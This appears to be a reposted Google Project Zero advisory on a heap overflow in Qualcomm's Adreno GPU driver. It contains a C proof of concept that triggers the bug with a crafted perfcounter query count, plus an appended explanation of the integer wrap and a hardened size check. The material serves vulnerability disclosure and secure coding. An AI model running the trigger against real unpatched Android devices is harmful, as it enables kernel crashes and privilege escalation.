Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow
Source: google.com  Author: Google  Published: 2016-02-29
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=734
 
The Adreno GPU driver for the MSM Linux kernel contains a heap
overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug
results from min_t(int, ...) comparing the caller-supplied count as a
signed int when calculating the minimum count value for the query: a
count with the top bit set is treated as negative, wins the
comparison, and is then stored back into an unsigned variable.
Multiplying that value by sizeof(unsigned int) to size the buffer
wraps the 32-bit size_t on 32-bit systems and yields a small
allocation:
 
int adreno_perfcounter_query_group(struct adreno_device *adreno_dev,
        unsigned int groupid, unsigned int __user *countables,
        unsigned int count, unsigned int *max_counters)
{
...
        if (countables == NULL || count == 0) {
                kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
                return 0;
        }
 
        t = min_t(int, group->reg_count, count);
 
        buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL);
        if (buf == NULL) {
                kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
                return -ENOMEM;
        }
 
        for (i = 0; i < t; i++)
                buf[i] = group->regs[i].countable;
 
Note that the "count" parameter is fully user-controlled. Setting
count = 0x80000001 makes min_t compare -2147483647 against
group->reg_count and return 0x80000001 for "t". On a 32-bit kernel
t * sizeof(unsigned int) wraps to 4, so kmalloc returns a 4-byte
buffer. The copy loop then overflows "buf", because its bound "t" is
unsigned, i.e. a large positive value (and once i passes
group->reg_count the loop also reads past the end of group->regs).
 
The bug was added in the following commit:
 
https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c
 
A proof-of-concept that triggers this issue (adreno_perfcnt_query.c)
follows below. On Android devices /dev/kgsl-3d0 is typically
accessible from the untrusted app domain, so if exploited this issue
could be used for local privilege escalation.
 
*/
 
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
 
/* Userspace mirror of the kernel's struct kgsl_perfcounter_query (msm_kgsl.h). */
struct kgsl_perfcounter_query {
    unsigned int groupid;       /* perfcounter group to query */
    unsigned int *countables;   /* user buffer the driver copies countables into */
    unsigned int count;         /* number of entries in countables: attacker-controlled */
    unsigned int max_counters;  /* filled in by the driver */
    unsigned int __pad[2];      /* reserved for future use */
};
 
#define KGSL_IOC_TYPE 0x09
#define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)
 
int main(void) {
    int fd;
    int ret;
    struct kgsl_perfcounter_query data;
    unsigned int countables[16];
 
    /* The GPU device node is typically reachable from the untrusted app domain,
     * so no special privileges are needed to reach the vulnerable ioctl. */
    fd = open("/dev/kgsl-3d0", O_RDWR);
 
    if (fd == -1) {
        perror("open");
        return -1;
    }
 
    memset(&data, 0, sizeof(struct kgsl_perfcounter_query));
 
    data.groupid = 1;
    data.countables = countables;
    /* 0x80000001 becomes negative when min_t(int, ...) casts it, so t = 0x80000001
     * and t * sizeof(unsigned int) wraps to 4 on a 32-bit kernel: a 4-byte heap
     * buffer that the driver's copy loop then overruns. */
    data.count = 0x80000001;
 
    /* On a vulnerable 32-bit kernel the heap overrun typically crashes the kernel
     * rather than returning; a patched kernel rejects or clamps the request. */
    ret = ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data);
    if (ret == -1)
        perror("ioctl");
 
    close(fd);
 
    return 0;
}
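The arithmetic behind the advisory's count = 0x80000001 trigger, worked through in userland C as an added example (this is not code from the Project Zero issue or from the MSM driver): min_int() and min_uint() stand in for the kernel's min_t(), DEMO_REG_COUNT is an assumed group size, and safe_alloc_size() is an assumed hardened variant of the size computation, not the driver's actual fix. The 32-bit and 64-bit models show why the tiny allocation only occurs with a 32-bit size_t; on a 64-bit kernel the same request asks kmalloc for 0x200000004 bytes and simply fails.

```c
#include <stdint.h>
#include <stdio.h>

/* Userland models of the kernel's min_t(int, a, b) and min_t(unsigned int, a, b):
 * min_t casts both operands to the named type before comparing, so passing a
 * uint32_t with the top bit set to min_int() turns it into a negative value
 * (two's-complement wrap, as on every Linux target). */
static int min_int(int a, int b) { return a < b ? a : b; }
static unsigned int min_uint(unsigned int a, unsigned int b) { return a < b ? a : b; }

/* Assumed reg_count for a perfcounter group; real groups are similarly small. */
#define DEMO_REG_COUNT 8u

/* The loop bound the driver computes: t = min_t(int, group->reg_count, count),
 * stored back into an unsigned variable. */
static unsigned int vuln_loop_bound(uint32_t reg_count, uint32_t count)
{
    unsigned int t = min_int(reg_count, count);   /* count -> int -> negative -> "smaller" */
    return t;                                     /* 0x80000001 for count = 0x80000001 */
}

/* kmalloc size as a 32-bit kernel computes it: size_t is 32 bits there, so
 * t * sizeof(unsigned int) is reduced modulo 2^32. */
static uint32_t vuln_alloc_size32(uint32_t reg_count, uint32_t count)
{
    uint32_t t = vuln_loop_bound(reg_count, count);
    return (uint32_t)(t * (uint32_t)sizeof(unsigned int));  /* 0x80000001 * 4 -> 4 */
}

/* Same expression on a 64-bit kernel: no wrap, kmalloc(0x200000004) just fails. */
static uint64_t vuln_alloc_size64(uint32_t reg_count, uint32_t count)
{
    uint64_t t = vuln_loop_bound(reg_count, count);
    return t * sizeof(unsigned int);
}

/* Hardened variant (assumed here, not taken from the driver's fix): compare as
 * unsigned so t can never exceed reg_count, and refuse a product that would not
 * fit in size_t, which is the check kcalloc() performs in the kernel. Returns 0
 * on overflow; the driver already rejects count == 0 before reaching this point. */
static size_t safe_alloc_size(uint32_t reg_count, uint32_t count)
{
    unsigned int t = min_uint(reg_count, count);
    if (t > SIZE_MAX / sizeof(unsigned int))
        return 0;
    return (size_t)t * sizeof(unsigned int);
}

int main(void)
{
    uint32_t evil = 0x80000001u;

    printf("count=0x%08x: loop bound %u, kmalloc(32-bit)=%u bytes, "
           "kmalloc(64-bit)=%llu bytes, hardened=%zu bytes\n",
           evil, vuln_loop_bound(DEMO_REG_COUNT, evil),
           vuln_alloc_size32(DEMO_REG_COUNT, evil),
           (unsigned long long)vuln_alloc_size64(DEMO_REG_COUNT, evil),
           safe_alloc_size(DEMO_REG_COUNT, evil));
    return 0;
}
```

The loop bound is the part that matters for exploitation: even though kmalloc hands back only 4 bytes, the driver's `for (i = 0; i < t; i++)` runs 0x80000001 iterations, writing one countable per iteration past the end of the allocation.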
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved